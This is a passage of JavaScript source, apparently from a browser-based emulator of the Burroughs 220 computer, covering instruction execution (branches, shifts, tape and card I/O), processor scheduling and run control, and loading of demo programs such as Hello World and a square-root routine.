(this.OFT.value) { this.P.set(this.CADDR); this.OFT.set(0); this.opTime += 0.020; } this.operationComplete(); break; case 0x32: //--------------------- BRP Branch, repeat this.opTime = 0.015; if (this.RPT.value) { this.P.set(this.CADDR); this.RPT.set(0); this.opTime += 0.020; } this.operationComplete(); 
break; case 0x33: //--------------------- BSA Branch, sign A this.opTime = 0.085; this.SUT.set(1); if ((this.A.value - this.A.value%0x10000000000)/0x10000000000 == this.CCONTROL%0x10) { this.P.set(this.CADDR); this.opTime += 0.020; } this.operationComplete(); break; case 0x34: //--------------------- BCH/BCL Branch, comparison high/low this.opTime = 0.015; if (this.UET.value) { if (this.HIT.value) { // HIGH condition if (this.CCONTROL%0x10 != 1) { // BCH -- test for high condition this.P.set(this.CADDR); this.opTime += 0.020; } } else { // LOW condition if (this.CCONTROL%0x10 == 1) { // BCL -- test for low condition this.P.set(this.CADDR); this.opTime += 0.020; } } } else { if (this.HIT.value) { // EQUAL condition // continue in sequence } else { // no condition is set this.setProgramCheck(1); } } this.operationComplete(); break; case 0x35: //--------------------- BCE/BCU Branch, comparison equal/unequal this.opTime = 0.015; if (this.UET.value) { // UNEQUAL condition if (this.CCONTROL%0x10 == 1) { // BCU -- test for unequal condition this.P.set(this.CADDR); this.opTime += 0.020; } else { // continue in sequence } } else { if (this.HIT.value) { // EQUAL condition if (this.CCONTROL%0x10 != 1) { // BCE -- test for equal condition this.P.set(this.CADDR); this.opTime += 0.020; } } else { // no condition is set this.setProgramCheck(1); } } this.operationComplete(); break; case 0x36: //--------------------- BFA Branch, field A this.branchField(this.A.value); this.operationComplete(); break; case 0x37: //--------------------- BFR Branch, field R this.branchField(this.R.value); this.operationComplete(); break; case 0x38: //--------------------- BCS Branch, control switch this.opTime = 0.015; // minimum instruction timing d = (this.CCONTROL - this.CCONTROL%0x1000)/0x1000; if (this["PC" + d.toString() + "SW"]) { this.opTime += 0.020; this.P.set(this.CADDR); } this.operationComplete(); break; case 0x39: //--------------------- SOR/SOH/IOM Set overflow remember/halt, Interrogate overflow mode // Note: it's not clear what should happen if the variant digit (41) is // other than 0, 1, or 2. We assume the digit is used as a bit mask. 
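            // Under that bit-mask assumption, a variant of 0 acts as SOR, 1 as SOH, and
            // 2 as IOM; a variant of 3 falls into the IOM branch because the 2-bit is
            // tested first in the switch below.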
this.opTime = 0.015; switch (true) { case (this.CCONTROL & 0x02) == 0x02: // IOM: Interrogate overflow mode if (this.HCT.value) { this.P.set(this.CADDR); this.opTime += 0.020; } break; case (this.CCONTROL & 0x01) == 0x01: // SOH: Set overflow halt this.HCT.set(1); if (this.OFT.value) { this.setStop(); } break; default: // SOR: Set overflow remember this.HCT.set(0); break; } this.operationComplete(); break; case 0x40: //--------------------- ST* Store A/R/B this.storeRegister(); this.operationComplete(); break; case 0x41: //--------------------- LDR Load R this.opTime = 0.085; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { this.D.set(this.IB.value); this.R.set(this.IB.value); } this.operationComplete(); break; case 0x42: //--------------------- LDB/LBC Load B/B complement this.opTime = 0.090; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { this.D.set(this.IB.value); if (this.CCONTROL%0x10 == 1) { // Load B complement this.B.set(this.bcdAdd(this.IB.value, 0, 4, 1, 1)); } else { // Load B this.B.set(this.IB.value%0x10000); } } this.operationComplete(); break; case 0x43: //--------------------- LSA Load sign A this.opTime = 0.015 this.A.set(this.A.value%0x10000000000 + (this.CCONTROL%0x10)*0x10000000000); this.operationComplete(); break; case 0x44: //--------------------- STP Store P this.opTime = 0.095; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { this.IB.set(this.IB.value - this.IB.value%0x10000 + this.bcdAdd(this.P.value, 1, 4)); this.D.set(this.IB.value); this.writeMemory(); } this.operationComplete(); break; case 0x45: //--------------------- CL* Clear A/R/B this.opTime = 0.010; if (this.CCONTROL & 0x01) { this.A.set(0); } if (this.CCONTROL & 0x02) { this.R.set(0); } if (this.CCONTROL & 0x04) { this.B.set(0); } this.operationComplete(); break; case 0x46: //--------------------- CLL Clear location this.opTime = 0.025; this.E.set(this.CADDR); this.writeMemory(); // IB is still zero this.operationComplete(); break; case 0x48: //--------------------- SR* Shift right A/A and R/A with sign x = B220Processor.bcdBinary(this.CADDR % 0x20); this.opTime = 0.020 + x*0.005; this.DC.set(B220Processor.binaryBCD(20-x)); switch (this.CCONTROL%0x10) { case 1: // SRT: Shift Right A and R w = this.A.value % 0x10000000000; // A sign is not affected this.R.value %= 0x10000000000; // discard the R sign while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10; this.R.value = (this.R.value - this.R.value%0x10)/0x10 + d*0x1000000000; this.DC.inc(); } this.R.set(this.A.value - this.A.value%0x10000000000 + this.R.value); // copy A sign into R this.A.set(this.A.value - this.A.value%0x10000000000 + w); // restore the A sign break; case 2: // SRS: Shift Right A with Sign w = this.A.value % 0x100000000000; // A sign is included while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10; this.DC.inc(); } this.A.set(w); break; default: // SRA: Shift Right A w = this.A.value % 0x10000000000; // A sign is not affected while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10; this.DC.inc(); } this.A.set(this.A.value - this.A.value%0x10000000000 + w); // restore the A sign break; } // switch on control digit this.operationComplete(); break; case 0x49: //--------------------- SL* Shift (rotate) left A/A and R/A with sign switch (this.CCONTROL%0x10) { case 1: // SLT: Shift Left A and R x = this.CADDR % 0x20; if (x < 0x10) { this.opTime = 0.210 - x*0.005; } else { this.opTime = 0.160 - (x-0x10)*0.005; } this.DC.set(x); w = this.R.value % 0x10000000000; // R sign is 
not affected this.A.value %= 0x10000000000; // discard the A sign while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10 + (this.A.value%0x10)*0x1000000000; this.A.value = (this.A.value - this.A.value%0x10)/0x10 + d*0x1000000000; this.DC.inc(); } this.A.set(this.R.value - this.R.value%0x10000000000 + this.A.value); // copy R sign into A this.R.set(this.R.value - this.R.value%0x10000000000 + w); // restore the R sign break; case 2: // SLS: Shift Left A with Sign x = this.CADDR % 0x10; this.opTime = 0.160 - x*0.005; this.DC.set(0x10+x); w = this.A.value % 0x100000000000; // A sign is included d = w % 0x10; // do one more rotate right w = (w-d)/0x10 + d*0x10000000000; // than the count calls for while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10 + d*0x10000000000; this.DC.inc(); } this.A.set(w); break; default: // SLA: Shift Left A x = this.CADDR % 0x10; this.opTime = 0.160 - x*0.005; this.DC.set(0x10+x); w = this.A.value % 0x10000000000; // A sign is not affected while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10 + d*0x1000000000; this.DC.inc(); } this.A.set(this.A.value - this.A.value%0x10000000000 + w); // restore the A sign break; } // switch on control digit this.operationComplete(); break; case 0x50: //--------------------- MTS/MFS/MLS/MRW/MDA Magnetic tape search/field search/lane select/rewind this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.vDigit = this.CCONTROL%0x10; this.ioInitiate(); if (this.vDigit & 0x08) { // MRW/MDA: rewind, with or without lockout this.magTape.rewind(this.D.value); } else if (this.vDigit & 0x04) { // MLS: lane select this.magTape.laneSelect(this.D.value); } else { // MTS/MFS: search or field search if (this.D.value%0x80000000000 < 0x40000000000) { // sign 4-bit = 0: full-word search this.magTape.search(this.D.value, 0); } else { // partial-word search based on sL00 in B this.magTape.search(this.D.value, this.B.value); } } } break; case 0x51: //--------------------- MTC/MFC Magnetic tape scan/field scan this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); if (this.D.value%0x80000000000 < 0x40000000000) { // sign 4-bit = 0: full-word search this.magTape.scan(this.D.value, 0); } else { // partial-word search based on sL00 in B this.magTape.scan(this.D.value, this.B.value); } } break; case 0x52: //--------------------- MRD Magnetic tape read this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.vDigit = this.CCONTROL%0x10; // controlword and B-mod bits this.ioInitiate(); this.magTape.read(this.D.value, false); } break; case 0x53: //--------------------- MRR Magnetic tape read, record this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.vDigit = this.CCONTROL%0x10; // controlword and B-mod bits this.ioInitiate(); this.magTape.read(this.D.value, true); } break; case 0x54: //--------------------- MIW Magnetic tape initial write this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; 
                this.ioInitiate();
                this.magTape.initialWrite(this.D.value, false);
            }
            break;
        case 0x55:      //--------------------- MIR Magnetic tape initial write, record
            this.opTime = 0.160;
            if (!this.magTape) {
                this.setMagneticTapeCheck(true);        // no tape control
                this.operationComplete();
            } else {
                this.selectedUnit = (this.CCONTROL >>> 12)%0x10;
                this.ioInitiate();
                this.magTape.initialWrite(this.D.value, true);
            }
            break;
        case 0x56:      //--------------------- MOW Magnetic tape overwrite
            this.opTime = 0.160;
            if (!this.magTape) {
                this.setMagneticTapeCheck(true);        // no tape control
                this.operationComplete();
            } else {
                this.selectedUnit = (this.CCONTROL >>> 12)%0x10;
                this.ioInitiate();
                this.magTape.overwrite(this.D.value, false);
            }
            break;
        case 0x57:      //--------------------- MOR Magnetic tape overwrite, record
            this.opTime = 0.160;
            if (!this.magTape) {
                this.setMagneticTapeCheck(true);        // no tape control
                this.operationComplete();
            } else {
                this.selectedUnit = (this.CCONTROL >>> 12)%0x10;
                this.ioInitiate();
                this.magTape.overwrite(this.D.value, true);
            }
            break;
        case 0x58:      //--------------------- MPF/MPB/MPE Magnetic tape position forward/backward/at end
            this.opTime = 0.130;
            if (!this.magTape) {
                this.setMagneticTapeCheck(true);        // no tape control
                this.operationComplete();
            } else {
                this.selectedUnit = (this.CCONTROL >>> 12)%0x10;
                this.ioInitiate();
                switch (this.CCONTROL%0x10) {
                case 1:         // MPB: position tape backward
                    this.magTape.positionBackward(this.D.value);
                    break;
                case 2:         // MPE: position tape at end
                    this.magTape.positionAtEnd(this.D.value);
                    break;
                default:        // MPF: position tape forward
                    this.magTape.positionForward(this.D.value);
                    break;
                } // switch on operation variant
            }
            break;
        case 0x59:      //--------------------- MIB/MIE Magnetic tape interrogate, branch/end of tape, branch
            if (!this.magTape) {
                this.opTime = 0.01;
            } else if (this.magTape.controlBusy) {
                this.opTime = 0.01;
            } else {
                this.opTime = 0.14;
                if (this.CCONTROL%0x10 == 1) {          // MIE
                    if (this.magTape.testUnitAtEOT(this.D.value)) {
                        this.P.set(this.CADDR);
                        this.opTime += 0.020;
                    }
                } else {                                // MIB
                    if (this.magTape.testUnitReady(this.D.value)) {
                        this.P.set(this.CADDR);
                        this.opTime += 0.020;
                    }
                }
            }
            this.operationComplete();
            break;
        case 0x60:      //--------------------- CRD Card read
            this.opTime = 1.600;                        // rough minimum estimate
            this.E.set(this.CADDR);
            this.D.set(0);
            if (!this.cardatron) {
                this.setCardatronCheck(1);
                this.operationComplete();
            } else {
                this.selectedUnit = (this.CCONTROL >>> 12)%0x10;
                this.rDigit = this.CCONTROL%0x10;
                this.vDigit = (this.CCONTROL >>> 4)%0x10;
                this.ioInitiate();
                d = this.cardatron.inputInitiate(this.selectedUnit, this.rDigit, this.boundCardatronReceiveWord);
                if (d < 0) {                            // invalid unit
                    this.setCardatronCheck(1);
                    this.ioComplete(true);
                }
            }
            break;
        case 0x61:      //--------------------- CWR Card write
            this.opTime = 1.600;                        // rough minimum estimate
            this.E.set(this.CADDR);
            this.D.set(0);
            if (!this.cardatron) {
                this.setCardatronCheck(1);
                this.operationComplete();
            } else {
                this.selectedUnit = (this.CCONTROL >>> 12)%0x10;
                this.rDigit = this.CCONTROL%0x10;
                this.vDigit = (this.CCONTROL >>> 4)%0x10;
                this.ioInitiate();
                d = this.cardatron.outputInitiate(this.selectedUnit, this.rDigit, this.vDigit, this.boundCardatronOutputWord, this.boundCardatronOutputFinished);
                if (d < 0) {                            // invalid unit
                    this.setCardatronCheck(1);
                    this.ioComplete(true);
                }
            }
            break;
        case 0x62:      //--------------------- CRF Card read, format load
            this.opTime = 1.600;                        // rough minimum estimate
            this.E.set(this.CADDR);
            this.D.set(0);
            if (!this.cardatron) {
                this.setCardatronCheck(1);
                this.operationComplete();
            } else {
                this.selectedUnit = (this.CCONTROL >>> 12)%0x10;
                this.rDigit = this.CCONTROL%0x10;
                this.ioInitiate();
                d = this.cardatron.inputFormatInitiate(this.selectedUnit, this.rDigit, this.boundCardatronOutputWord, this.boundCardatronOutputFinished);
                if (d < 0) {                            // invalid unit
                    this.setCardatronCheck(1);
                    this.ioComplete(true);
                }
            }
            break;
        case 0x63:      //--------------------- CWF Card write, format load
            this.opTime = 1.600;                        // rough minimum estimate
            this.E.set(this.CADDR);
            this.D.set(0);
            if (!this.cardatron) {
                this.setCardatronCheck(1);
                this.operationComplete();
            } else {
                this.selectedUnit = (this.CCONTROL >>> 12)%0x10;
                this.rDigit = this.CCONTROL%0x10;
                this.ioInitiate();
                d = this.cardatron.outputFormatInitiate(this.selectedUnit, this.rDigit, this.boundCardatronOutputWord, this.boundCardatronOutputFinished);
                if (d < 0) {                            // invalid unit
                    this.setCardatronCheck(1);
                    this.ioComplete(true);
                }
            }
            break;
        case 0x64:      //--------------------- CRI Card read interrogate, branch
            this.opTime = 0.265;                        // average
            this.E.set(this.CADDR);
            this.D.set(0);
            if (!this.cardatron) {
                this.setCardatronCheck(1);
            } else {
                this.selectedUnit = (this.CCONTROL >>> 12)%0x10;
                d = this.cardatron.inputReadyInterrogate(this.selectedUnit);
                if (d < 0) {                            // invalid unit
                    this.setCardatronCheck(1);
                } else if (d > 0) {
                    this.opTime += 0.020;
                    this.P.set(this.CADDR);
                }
            }
            this.operationComplete();
            break;
        case 0x65:      //--------------------- CWI Card write interrogate, branch
            this.opTime = 0.265;                        // average
            this.E.set(this.CADDR);
            this.D.set(0);
            if (!this.cardatron) {
                this.setCardatronCheck(1);
            } else {
                this.selectedUnit = (this.CCONTROL >>> 12)%0x10;
                d = this.cardatron.outputReadyInterrogate(this.selectedUnit);
                if (d < 0) {                            // invalid unit
                    this.setCardatronCheck(1);
                } else if (d > 0) {
                    this.opTime += 0.020;
                    this.P.set(this.CADDR);
                }
            }
            this.operationComplete();
            break;
        case 0x66:      //--------------------- HPW High speed printer write
            this.setProgramCheck(1);
            this.operationComplete();
            break;
        case 0x67:      //--------------------- HPI High speed printer interrogate, branch
            this.setProgramCheck(1);
            this.operationComplete();
            break;
        default:        //--------------------- Invalid op code -- set Program Check alarm
            this.setProgramCheck(1);
            this.operationComplete();
            break;
        } // switch this.COP
};

/***********************************************************************
*   Processor Run Control                                              *
***********************************************************************/

/**************************************/
B220Processor.prototype.operationComplete = function operationComplete() {
    /* Implements Operation Complete for the Execute cycle. If we're not
    locked in Execute, switch to Fetch cycle next */

    if (this.FETCHEXECUTELOCKSW != 1) {
        this.EXT.set(0);                        // set to FETCH state
    }

    this.execClock += this.opTime;
    if (this.ORDERCOMPLEMENTSW) {
        this.C.flipBit(16);                     // complement low order bit of op code
        this.COP ^= 0x01;
    }

    if (!this.RUT.value) {                      // halted
        this.stop();
    } else if (this.SST.value) {
        this.stop();                            // single-stepping
    } else if (this.SONSW) {
        if (this.STOCSW) {                      // check for post-execute S-to-C stop
            if (this.SUNITSSW) {
                if (this.C.value%0x10 == this.S.value%0x10) {
                    this.stop();
                }
            } else if (this.C.value%0x10000 == this.S.value) {
                this.stop();
            }
        }
    }
};

/**************************************/
B220Processor.prototype.ioComplete = function ioComplete(restart) {
    /* Implements completion of the Execute cycle for an I/O instruction that
    has been executing asynchronously.
If "restart" is true, the Processor will resume automatic operation */ this.AST.set(0); this.asyncOff(); this.procOff(); this.operationComplete(); if (restart && this.RUT.value) { this.schedule(); } }; /**************************************/ B220Processor.prototype.ioInitiate = function ioInitiate() { /* Initiates asynchronous mode of the processor for I/O */ this.AST.set(1); this.asyncOn(); this.execLimit = 0; // kill the run() loop }; /**************************************/ B220Processor.prototype.traceState = function traceState() { /* Logs a subset of the Processor state to the Javascript console for debugging purposes */ console.log("P=" + B220Processor.padLeft(this.P.value.toString(16), 4) + " | B=" + B220Processor.padLeft(this.B.value.toString(16), 4) + " | C=" + B220Processor.formatWord(this.C.value).substring(2) + " | A=" + B220Processor.formatWord(this.A.value) + " | R=" + B220Processor.formatWord(this.R.value) + " | D=" + B220Processor.formatWord(this.D.value) + " | E=" + B220Processor.padLeft(this.E.value.toString(16), 4) + " | UET=" + this.UET.value + " | HIT=" + this.HIT.value + " | OFT=" + this.OFT.value + " | RPT=" + this.RPT.value); }; /**************************************/ B220Processor.prototype.run = function run() { /* Main execution control loop for the processor. Called from this.schedule() to initiate a time slice. Will continue fetch/execute cycles until the time slice expires, a stop condition is detected, or AST (asynchronous toggle) is set indicating the processor has been suspended during an I/O. This routine effectively implements Operation Complete (O.C.) for the Fetch and Execute cycles, although it is more of a "ready for next operation" function, determining if there is a stop condition, or whether to do a Fetch or Execute cycle next. The fetch() and execute() methods exit back here, and in most cases we simply step to the next cycle. In the case of asynchronous operation, however, we simply exit, and the I/O interface will call this.schedule() to restart execution again once memory transfers have completed */ this.execLimit = this.execClock + B220Processor.timeSlice; do { if (this.EXT.value) { // enter EXECUTE cycle this.execute(); } else { // enter FETCH cycle if (this.tracing) { this.traceState(); // DEBUG ONLY } if (this.SONSW) { // check for post-fetch S-to-P stop if (this.STOPSW) { // must check before P is incremented in fetch() if (this.SUNITSSW) { if (this.P.value%0x10 == this.S.value%0x10) { this.stop(); } } else if (this.P.value == this.S.value) { this.stop(); } } } this.fetch(false); if (this.SST.value) { this.stop(); // single-stepping } break; } } while (this.execClock < this.execLimit); }; /**************************************/ B220Processor.prototype.schedule = function schedule() { /* Schedules the next processor time slice and attempts to throttle performance to approximate that of a real B220. It establishes a time slice in terms of a number milliseconds each and calls run() to execute for at most that amount of time. run() counts up instruction times until it reaches this limit or some terminating event (such as a stop), then exits back here. 
If the processor remains active, this routine will reschedule itself after an appropriate delay, thereby throttling the performance and allowing other modules to share the single Javascript execution thread */ var delayTime = 0; // delay from/until next run() for this processor, ms var stamp = performance.now(); // ending time for the delay and the run() call, ms this.scheduler = 0; // If run() has been called by a throttling delay, compute the delay stats. if (this.delayLastStamp > 0) { delayTime = stamp - this.delayLastStamp; this.procSlack += delayTime; // Compute the exponential weighted average of scheduling delay deviation. this.delayDeltaAvg = (delayTime - this.delayRequested)*B220Processor.delayAlpha + this.delayDeltaAvg*B220Processor.delayAlpha1; this.procSlackAvg = delayTime*B220Processor.slackAlpha + this.procSlackAvg*B220Processor.slackAlpha1; } // Execute the time slice. this.runStamp = stamp; // starting clock time for time slice this.procOn(); // prepare to accumulate internal processor time this.run(); stamp = performance.now(); this.procRunAvg = (stamp - this.runStamp)*B220Processor.slackAlpha + this.procRunAvg*B220Processor.slackAlpha1; // Determine what to do next. this.runStamp = stamp; // DEBUG: for DiagMonitor use only. if (!this.RUT.value) { // Processor is stopped, just inhibit delay averaging on next call and exit. this.delayLastStamp = 0; this.procOff(); // accumulate internal processor time for the slice } else if (this.AST.value) { // Processor is idle during I/O, but still accumulating clocks, so no procOff(). this.delayLastStamp = 0; } else { this.procOff(); // accumulate internal processor time for the slice // The processor is still running, so schedule next time slice after a // throttling delay. delayTime is the number of milliseconds the // processor is running ahead of real-world time. Web browsers have a // certain minimum setTimeout() delay. If the delay is less than our // estimate of that minimum, setCallback() will yield to the event loop // but otherwise continue (real time should eventually catch up -- we // hope). If the delay is greater than the minimum, setCallback() will // reschedule us after that delay. 
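        // As a worked example: if execClock has advanced to 12345.0 ms of emulated time
        // while the real-time stamp is only at 12340.2 ms, the processor is 4.8 ms ahead
        // of real time, so a delay of about 4.8 ms is requested before the next slice.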
delayTime = this.execClock - stamp; this.delayRequested = delayTime; this.delayLastStamp = stamp; this.scheduler = setCallback(this.mnemonic, this, delayTime, schedule); } }; /**************************************/ B220Processor.prototype.start = function start() { /* Initiates a time slice for the processor according to the EXT state */ var stamp = performance.now(); if (this.poweredOn && !this.RUT.value && !this.AST.value && !this.digitCheckAlarm.value && !this.ALT.value && !this.MET.value && !this.TAT.value && !this.CRT.value && !this.PAT.value && !this.HAT.value && !this.systemNotReady.value && !this.computerNotReady.value) { this.execClock = stamp; this.asyncTime = 0; this.delayLastStamp = 0; this.delayRequested = 0; this.RUT.set(1); // Start the processor timer while (this.procTimer >= 0) { this.procTimer -= stamp; } // Start the run timer while (this.runTimer >= 0) { this.runTimer -= stamp; } this.updateLampGlow(1); // freeze state in the lamps this.schedule(); } }; /**************************************/ B220Processor.prototype.stop = function stop() { /* Stops running the processor on the Javascript thread */ var stamp = performance.now(); if (this.poweredOn) { this.execLimit = 0; // kill the time slice this.SST.set(0); this.RUT.set(0); this.AST.set(0); // Stop the timers this.asyncOff(); this.procOff(); // Stop the run timer while (this.runTimer < 0) { this.runTimer += stamp; } // Stop the processor timer while (this.procTimer < 0) { this.procTimer += stamp; } this.updateLampGlow(1); // freeze state in the lamps if (this.scheduler) { clearCallback(this.scheduler); this.scheduler = 0; } } }; /**************************************/ B220Processor.prototype.step = function step() { /* Single-steps the processor. This will execute the next Fetch or Execute cycle only, then stop the processor */ if (this.poweredOn) { if (!this.RUT.value) { this.SST.set(1); this.start(); } } }; /**************************************/ B220Processor.prototype.setStop = function setStop() { /* Initiates a halt of the processor. 
The processor will execute through the end of the Execute cycle, then stop */ if (this.poweredOn) { if (this.RUT.value) { this.RUT.set(0); } else { this.stop(); } } }; /**************************************/ B220Processor.prototype.setCycle = function setCycle(cycle) { /* Sets the processor cycle to Fetch (0) or Execute (1) */ if (this.poweredOn) { if (!this.RUT.value) { this.EXT.set(cycle); } } }; /**************************************/ B220Processor.prototype.toggleCompareLamps = function toggleCompareLamps(condition) { /* Toggles the comparison lamps and sets the processor UET and HIT toggles according to the condition: <0=LOW, 0=EQUAL, >0=HIGH */ if (this.poweredOn) { if (condition < 0) { // LOW this.compareLowLamp.flip(); this.compareEqualLamp.set(0); this.compareHighLamp.set(0); this.UET.set(this.compareLowLamp.value); this.HIT.set(0); } else if (condition > 0) { // HIGH this.compareLowLamp.set(0); this.compareEqualLamp.set(0); this.compareHighLamp.flip(); this.UET.set(this.compareHighLamp.value); this.HIT.set(this.compareHighLamp.value); } else { // EQUAL this.compareLowLamp.set(0); this.compareEqualLamp.flip(); this.compareHighLamp.set(0); this.UET.set(0); this.HIT.set(this.compareEqualLamp.value); } } }; /**************************************/ B220Processor.prototype.resetRunTimer = function resetRunTimer() { /* Resets the elapsed run-time timer to zero */ if (this.poweredOn) { this.instructionCount = 0; if (this.runTimer < 0) { // it's running, adjust its bias this.runTimer = -performance.now(); } else { // it's stopped, just zero it this.runTimer = 0; } } }; /**************************************/ B220Processor.prototype.resetTransfer = function resetTransfer() { /* Initiates a Reset and Transfer operation, storing P in address 0000/04 and C in 0000/64, then branching to address 0001. 
Always active, even when running */ if (this.poweredOn) { this.digitCheckAlarm.set(0); this.ALT.set(0); this.MET.set(0); this.TAT.set(0); this.CRT.set(0); this.PAT.set(0); this.HAT.set(0); this.E.set(0x0000); this.readMemory(); this.IB.set(this.IB.value - this.IB.value % 0x100000000 + (this.C.value % 0x10000)*0x10000 + this.P.value % 0x10000); this.writeMemory(); this.P.set(0x0001); if (this.AST.value) { // I/O in progress -- cancel it this.ioComplete(true); } else { this.EXT.set(0); // set to Fetch cycle } if (!this.RUT.value) { this.start(); } } }; /**************************************/ B220Processor.prototype.tcuClear = function tcuClear() { /* Clears the Tape Control Unit */ if (this.poweredOn) { if (this.magTape) { this.magTape.clearUnit(); } } }; /**************************************/ B220Processor.prototype.powerUp = function powerUp() { /* Powers up the system */ if (!this.poweredOn) { this.clear(); this.poweredOn = 1; this.procTimer = this.runTimer = this.instructionCount = 0; this.procTime = this.procSlack = 0; this.procSlackAvg = this.procRunAvg = 0; this.delayDeltaAvg = this.delayRequested = 0; this.console = this.devices.ControlConsole; this.cardatron = this.devices.CardatronControl; this.magTape = this.devices.MagTapeControl; this.computerNotReady.set(1); // initial state after power-up this.updateLampGlow(1); } }; /**************************************/ B220Processor.prototype.powerDown = function powerDown() { /* Powers down the system */ if (this.poweredOn) { this.stop(); this.clear(); this.poweredOn = 0; this.updateLampGlow(1); this.cardatron = null; this.console = null; this.magTape = null; if (this.glowTimer) { clearInterval(this.glowTimer); this.glowTimer = null; } } }; /**************************************/ B220Processor.prototype.loadDefaultProgram = function loadDefaultProgram() { /* Loads a set of default demo programs to the memory drum */ // Simple counter speed test this.MM[ 80] = 0x0000120082; // ADD 82 this.MM[ 81] = 0x0000300080; // BUN 80 this.MM[ 82] = 0x0000000001; // CNST 1 // Hello World this.MM[ 90] = 0x0030090092; // SPO 92 this.MM[ 91] = 0x0000009999; // HLT 9999 this.MM[ 92] = 0x21648455353; // LIT R'HELL' this.MM[ 93] = 0x25600665659; // LIT 'O WOR' this.MM[ 94] = 0x25344000016; // LIT 'LD 'R // Tom Sawyer's "Square Roots 100" adapted from the 205 for the 220 (Babylonian or Newton's method): this.MM[ 100] = 0x0000100139; // CAD 139 this.MM[ 101] = 0x0000400138; // STA 138 this.MM[ 102] = 0x0000100139; // CAD 139 this.MM[ 103] = 0x0002450000; // CLR this.MM[ 104] = 0x0001480005; // SRT 5 this.MM[ 105] = 0x0000150138; // DIV 138 this.MM[ 106] = 0x0000400137; // STA 137 this.MM[ 107] = 0x0000130138; // SUB 138 this.MM[ 108] = 0x0000400136; // STA 136 this.MM[ 109] = 0x0001100136; // CAA 136 this.MM[ 110] = 0x0000180135; // CFA 135 this.MM[ 111] = 0x0001340119; // BCL 119 this.MM[ 112] = 0x0000100138; // CAD 138 this.MM[ 113] = 0x0000120137; // ADD 137 this.MM[ 114] = 0x0002450000; // CLR this.MM[ 115] = 0x0001480005; // SRT 5 this.MM[ 116] = 0x0000150134; // DIV 134 this.MM[ 117] = 0x0000400138; // STA 138 this.MM[ 118] = 0x0000300102; // BUN 102 this.MM[ 119] = 0x5011090139; // SPO 139 this.MM[ 120] = 0x5011090137; // SPO 137 this.MM[ 121] = 0x0010090132; // SPO 132 this.MM[ 122] = 0x0000100139; // CAD 139 this.MM[ 123] = 0x0000120133; // ADD 133 this.MM[ 124] = 0x0000400139; // STA 139 this.MM[ 125] = 0x0000300102; // BUN 102 this.MM[ 126] = 0; this.MM[ 127] = 0; this.MM[ 128] = 0; this.MM[ 129] = 0; this.MM[ 130] = 0; this.MM[ 131] = 0; 
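        // Layout reminder for the demo words in this routine: each word is 11 BCD digits
        // packed one per hex nibble -- sign, four control digits, two op-code digits,
        // four address digits -- so 0x0000300080 above decodes as sign 0, control 0000,
        // op 30 (BUN), address 0080.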
this.MM[ 132] = 0x20000000016; // carraige return this.MM[ 133] = 0x100000; this.MM[ 134] = 0x200000; this.MM[ 135] = 0x10; this.MM[ 136] = 0; this.MM[ 137] = 0; this.MM[ 138] = 0; this.MM[ 139] = 0x200000; // "Square Roots 100" adapted for floating-point and relative precision: this.MM[ 200] = 0x0000100239; // CAD 239 load initial argument this.MM[ 201] = 0x0000400238; // STA 238 store as initial upper bound this.MM[ 202] = 0x0000100239; // CAD 239 start of loop: load current argument this.MM[ 203] = 0x0002450000; // CR clear R this.MM[ 204] = 0x0000250238; // FDV 238 divide argument by upper bound this.MM[ 205] = 0x0000400237; // STA 237 store as current result this.MM[ 206] = 0x0000250238; // FDV 238 ratio to upper bound this.MM[ 207] = 0x0000400236; // STA 236 store as current precision this.MM[ 208] = 0x0001100235; // CAA 235 load target precision this.MM[ 209] = 0x0000230236; // FSU 236 subtract current precision this.MM[ 210] = 0x0001330218; // BSA 218,1 if current precision > target precision this.MM[ 211] = 0x0000010000; // NOP we're done -- jump out to print this.MM[ 212] = 0x0000100238; // CAD 238 load current upper bound this.MM[ 213] = 0x0000220237; // FAD 237 add current result this.MM[ 214] = 0x0002450000; // CR clear R this.MM[ 215] = 0x0000250234; // FDV 234 divide by 2.0 to get new upper bound this.MM[ 216] = 0x0000400238; // STA 238 store new upper bound this.MM[ 217] = 0x0000300202; // BUN 202 do another iteration this.MM[ 218] = 0x8011090239; // SPO 239 this.MM[ 219] = 0x8011090237; // SPO 237 this.MM[ 220] = 0x0010090232; // SPO 232 this.MM[ 221] = 0x0000010000; // NOP this.MM[ 222] = 0x0000100239; // CAD 239 load argument value this.MM[ 223] = 0x0000220233; // FAD 233 add 1 to argument value this.MM[ 224] = 0x0000400239; // STA 239 this.MM[ 225] = 0x0000300201; // BUN 201 start sqrt for next argument value this.MM[ 226] = 0; this.MM[ 227] = 0; this.MM[ 228] = 0; this.MM[ 229] = 0; this.MM[ 230] = 0; this.MM[ 231] = 0; this.MM[ 232] = 0x20202020216; // carriage return this.MM[ 233] = 0x05110000000; // 1.0 literal: argument increment this.MM[ 234] = 0x05120000000; // 2.0 literal this.MM[ 235] = 0x05099999990; // 0.99999990 literal: target precision this.MM[ 236] = 0; // current precision this.MM[ 237] = 0; // current sqrt result this.MM[ 238] = 0; // current upper bound on result this.MM[ 239] = 0x05120000000; // 2.0 sqrt argument // Print first 800 digits of Pi; adapted from C program by Dik Winter of CWI, Amsterdam this.MM[ 300]= 0x00000100371; // CAD FLIM this.MM[ 301]= 0x00000400365; // STA C C=FLIM this.MM[ 302]= 0x00000100363; // CAD A this.MM[ 303]= 